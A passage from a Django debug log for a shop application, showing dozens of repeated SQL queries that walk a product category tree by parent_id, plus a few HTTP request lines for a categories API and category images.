"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:18:28,909 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:18:28,913 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:18:28,917 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:18:28,921 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:18:28,925 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:18:28,927 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:18:28,930 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:18:28,932 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:18:28,935 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:18:28,938 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:18:28,941 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:18:28,943 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:18:28,946 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:18:28,948 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:18:28,952 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:18:28,954 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:18:28,957 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:18:28,959 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:18:28,962 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:18:28,964 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:18:28,968 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:18:28,970 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:18:28,973 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:18:28,975 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:18:28,978 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:18:28,981 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:18:28,984 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:18:28,986 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:18:28,991 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:18:28,995 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:18:29,002 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:18:29,006 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:18:29,010 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:18:29,015 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:18:29,019 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:18:29,023 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:18:29,028 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:18:29,032 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:18:29,036 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:18:29,041 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:18:29,045 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:18:29] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 11:18:29] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 11:18:29] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-19 11:20:30,562 utils 4252 140031482124032 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:20:30,573 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:20:30,580 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:20:30,584 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:20:30,590 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:20:30,594 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:20:30,598 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:20:30,602 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:20:30,607 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:20:30,613 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:20:30,617 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:20:30,621 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:20:30,625 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:20:30,629 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:20:30,635 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:20:30,639 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:20:30,643 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:20:30,647 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:20:30,651 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:20:30,658 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:20:30,662 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:20:30,667 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:20:30,671 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:20:30,674 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:20:30,678 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:20:30,684 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 